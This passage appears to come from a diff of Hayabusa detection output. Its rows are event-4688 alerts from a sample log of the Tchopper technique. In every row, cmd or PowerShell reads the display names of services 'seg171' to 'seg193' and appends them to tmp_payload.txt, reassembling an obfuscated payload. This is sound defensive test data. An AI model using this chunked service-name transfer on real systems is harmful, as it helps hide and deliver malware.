+2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
